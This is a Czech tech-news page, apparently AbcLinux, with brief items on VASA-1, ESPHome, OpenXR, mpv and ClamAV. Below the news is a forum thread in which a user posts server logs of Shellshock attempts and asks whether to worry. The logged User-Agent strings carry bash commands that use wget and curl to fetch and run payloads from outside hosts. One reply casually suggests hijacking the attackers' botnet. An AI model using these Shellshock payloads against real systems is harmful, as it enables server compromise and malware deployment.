VASA-1, výzkumný projekt Microsoftu. Na vstupu stačí jediná fotka a zvukový záznam. Na výstupu je dokonalá mluvící nebo zpívající hlava. Prý si technologii nechá jenom pro sebe. Žádné demo, API nebo placená služba. Zatím.
Nová čísla časopisů od nakladatelství Raspberry Pi: MagPi 140 (pdf) a HackSpace 77 (pdf).
ESPHome, tj. open source systém umožňující nastavovat zařízení s čipy ESP (i dalšími) pomocí konfiguračních souborů a připojit je do domácí automatizace, například do Home Assistantu, byl vydán ve verzi 2024.4.0.
LF AI & Data Foundation patřící pod Linux Foundation spustila Open Platform for Enterprise AI (OPEA).
Neziskové průmyslové konsorcium Khronos Group vydalo verzi 1.1 specifikace OpenXR (Wikipedie), tj. standardu specifikujícího přístup k platformám a zařízením pro XR, tj. platformám a zařízením pro AR (rozšířenou realitu) a VR (virtuální realitu). Do základu se z rozšíření dostalo XR_EXT_local_floor. Společnost Collabora implementuje novou verzi specifikace do platformy Monado, tj. open source implementace OpenXR.
Byla vydána nová verze 0.38.0 multimediálního přehrávače mpv (Wikipedie) vycházejícího z přehrávačů MPlayer a mplayer2. Přehled novinek, změn a oprav na GitHubu. Požadován je FFmpeg 4.4 nebo novější a také libplacebo 6.338.2 nebo novější.
ClamAV (Wikipedie), tj. multiplatformní antivirový engine s otevřeným zdrojovým kódem pro detekci trojských koní, virů, malwaru a dalších škodlivých hrozeb, byl vydán ve verzích 1.3.1, 1.2.3 a 1.0.6. Ve verzi 1.3.1 je mimo jiné řešena bezpečnostní chyba CVE-2024-20380.
Digitální a informační agentura (DIA) oznámila (PDF, X a Facebook), že mobilní aplikace Portál občana je ode dneška oficiálně venku.
#HACKUJBRNO 2024, byly zveřejněny výsledky a výstupy hackathonu města Brna nad otevřenými městskými daty, který se konal 13. a 14. dubna 2024.
Společnost Volla Systeme stojící za telefony Volla spustila na Kickstarteru kampaň na podporu tabletu Volla Tablet s Volla OS nebo Ubuntu Touch.
74.201.85.75 - - [28/Sep/2014:08:22:40 +0200] "GET / HTTP/1.0" 200 3171 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 74.201.85.75 - - [28/Sep/2014:08:22:40 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 493 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 74.201.85.75 - - [28/Sep/2014:08:22:40 +0200] "GET /test HTTP/1.0" 404 482 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" 94.32.106.53 - - [28/Sep/2014:11:07:18 +0200] "GET / HTTP/1.0" 200 3171 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" 54.251.83.67 - - [26/Sep/2014:21:42:29 +0200] "GET / HTTP/1.1" 200 3152 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" 173.45.100.18 - - [27/Sep/2014:22:38:02 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 488 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""ma mne to znepokojit? Na serveru mi bezi pouze php weby, zadne bash cgi skripty (alespon o zadnych nevim).
ma mne to znepokojit?Ne. Pokud tě to baví, můžeš si ten škodlivý kód stáhnout, podívat se, jak komunikuje, a zkusit, jestli nemají v komunikaci díru, pomocí které by je šlo vyownovat a botnet jim ukrást. Často mají.
Pokud tě to baví, můžeš si ten škodlivý kód stáhnout, podívat se, jak komunikuje, a zkusit, jestli nemají v komunikaci díru, pomocí které by je šlo vyownovat a botnet jim ukrást. Často mají.Hm, tohle vypadá na nějaký IRC DDOS crap, tak asi nic.
Tiskni Sdílej: